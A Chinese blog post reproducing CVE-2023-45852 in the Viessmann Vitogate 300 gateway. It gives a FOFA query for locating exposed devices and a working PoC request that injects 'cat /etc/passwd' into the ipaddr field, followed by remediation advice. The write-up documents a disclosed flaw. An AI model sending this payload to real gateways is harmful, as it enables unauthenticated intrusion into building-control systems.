Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)

最新推荐文章于 2024-07-29 01:38:46 发布
最新推荐文章于 2024-07-29 01:38:46 发布
阅读量480 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135758073
版权

0x01 产品简介

Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。

0x02 漏洞概述

Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。

0x03 影响范围

version <= 2.1.3.0

0x04 复现环境

FOFA:app="Vitogate-300"

0x05 漏洞复现

PoC

POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: your-ip
Content-Type: application/json

{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
go-vitotrol:golang客户端库到Viessmann Vitotrol Web服务
05-21
软件包go-vitotrol可提供对Viessmann:trade_mark:Vitotrol:trade_mark:云API的访问,以控制/监视锅炉。 参见 当前仅实现我真正需要的请求: 登录 获取设备 请求刷新状态 RequestWriteStatus 获取数据 写数据 ...
viessmann-serwis-krakow.github.io
02-21
【标题】"viessmann-serwis-krakow.github.io" 指的可能是一个开源项目或个人网站的GitHub托管页面,专门针对Viessmann在克拉科夫的服务。这个项目可能包含了Viessmann产品在克拉科夫地区的服务信息、用户手册、故障...
vclient-web:Viessmann Vito 加热系统的 Web 界面
06-24
它提供了通过网络控制 Viessmann Vito 加热系统的能力。目标简单的轻的可破解在很好依赖关系Python(已随 Raspbian 一起提供) ( sudo apt-get install python-cherrypy3 ) ( sudo apt-get install python-sqlite )...
vcontrold:用于Vito通信Linux守护程序-开源
05-07
《vcontrold:连接Viessmann Vito的开源通信守护程序》 在IT行业中,智能家居设备的管理和控制已经成为一个热门话题。Viessmann是一家知名的德国暖通空调制造商,其产品线包括了各种智能供热系统。为了更好地管理和...
vcontrold:vcontrold守护程序,用于控制和记录Viessmann:registered:类型的加热设备
05-14
vcontrold是用C语言编写的软件后台驻留程序,用于与Viessmann Vito加热控制器的“ Optolink”接口进行通信。 有关构建和安装说明,请参阅doc/INSTALL.md 。 可用于不同的平台。 请访问 ,以获取详细信息和示例。 ...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1356
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 811
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 726
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 597
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1474
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1344
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
子非渔
07-25 596
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
2024浙江省行政区划矢量图层-省市县乡镇四级行政区划数据下载-带python代码
最新发布
08-02
2024最新浙江省行政区划矢量图层数据,包含省、市、县、乡镇四级行政区划数据下载,附带shp转geojson的python代码
年度销售计划表.xlsx.xlsx
08-01
销售统计,调查问卷,库存明细,跟进表,业绩统计表,差异分析 ,产品清单 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
蓝牙BLE 4.0开发课程
08-01
蓝牙BLE 4.0课程
每日销售情况统计表.xls
08-01
销售统计,调查问卷,库存明细,跟进表,业绩统计表,差异分析 ,产品清单 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
TI官网cc2530资料.zip
08-01
TI官网cc2530资料.zip
工业互联网解决方案及案例分享.pptx
08-01
工业互联网解决方案及案例分享.pptx
《操作系统》试题库-判断题.doc
08-01
《操作系统》试题库-判断题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值